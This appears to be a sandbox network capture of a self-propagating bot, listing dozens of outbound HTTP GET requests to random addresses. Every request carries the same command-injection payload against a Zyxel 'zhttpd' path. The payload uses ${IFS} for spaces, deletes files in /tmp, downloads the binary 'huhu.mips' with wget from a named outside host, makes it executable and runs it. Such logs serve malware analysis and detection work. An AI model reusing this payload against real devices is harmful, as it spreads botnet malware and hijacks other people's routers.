                                      Jan 19, 2024 17:29:20.523751020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1171192.168.2.1449932137.173.122.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523777962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1172192.168.2.1448630111.134.237.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523814917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1173192.168.2.1456026129.147.196.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523864031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1174192.168.2.145063265.109.169.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523894072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1175192.168.2.145483476.132.53.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523940086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1176192.168.2.1456034126.140.180.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523962975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1177192.168.2.1439478155.88.162.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524008036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1178192.168.2.1444090178.160.57.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524032116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1179192.168.2.1453634156.124.131.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524079084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1180192.168.2.1446872120.212.87.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524112940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1181192.168.2.145684059.225.94.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524136066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1182192.168.2.144777089.189.112.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524180889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1183192.168.2.1459298141.219.95.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524235010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1184192.168.2.143300258.34.91.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524271965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1185192.168.2.144488696.69.161.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524311066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1186192.168.2.144806438.104.91.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524359941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1187192.168.2.1449928101.184.235.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524395943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1188192.168.2.146015890.92.255.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524456978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1189192.168.2.1452150125.100.46.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524487972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1190192.168.2.144649652.233.56.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524538040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1191192.168.2.1451634142.180.167.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524588108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192192.168.2.143380242.135.104.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524641991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1193192.168.2.1434636176.240.76.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524668932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1194192.168.2.1436556123.18.111.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524709940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1195192.168.2.1436116216.185.250.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524781942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1196192.168.2.1456010130.25.117.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524811983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1197192.168.2.14390365.34.191.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524869919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1198192.168.2.1448022107.234.115.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524914026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1199192.168.2.143926223.87.221.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524960041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1200192.168.2.145022034.42.56.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.524995089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1201192.168.2.145059497.4.76.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525032043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1202192.168.2.1446242189.220.66.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525070906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1203192.168.2.1454210116.72.59.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525120020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1204192.168.2.145360453.187.14.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525182962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1205192.168.2.143730492.83.122.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525223017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1206192.168.2.143639898.19.69.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525279999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1207192.168.2.143849098.20.154.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525333881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1208192.168.2.1438840137.165.169.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525377989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1209192.168.2.144732086.237.1.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525427103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1210192.168.2.1457448130.90.254.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525460958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1211192.168.2.1440162107.52.2.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525512934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1212192.168.2.1436564104.162.35.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525563002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1213192.168.2.1435028102.33.59.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525612116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1214192.168.2.145852219.68.82.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525655985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1215192.168.2.1432784209.118.210.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525718927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1216192.168.2.1460638135.159.112.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525770903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1217192.168.2.145938214.43.223.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525772095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1218192.168.2.143581037.152.153.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525804996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1219192.168.2.145168688.232.227.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525846004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1220192.168.2.1444334187.184.123.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525896072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1221192.168.2.1457840170.211.27.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525917053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1222192.168.2.1441894115.58.32.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.525943041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1223192.168.2.1447436143.161.99.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526011944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1224192.168.2.144529095.157.48.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526047945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1225192.168.2.1446808107.199.226.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526101112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1226192.168.2.1447488155.125.154.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526139021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1227192.168.2.1441412163.85.27.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526160955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1228192.168.2.1454620135.249.0.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526211023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1229192.168.2.1456620100.25.172.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526259899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1230192.168.2.1445772220.135.124.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526267052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1231192.168.2.144666824.253.140.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526335001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1232192.168.2.1457150151.14.80.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526380062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1233192.168.2.144046098.38.165.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526405096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1234192.168.2.1439272131.219.46.103443
                                      TimestampBytes transferredDirectionData
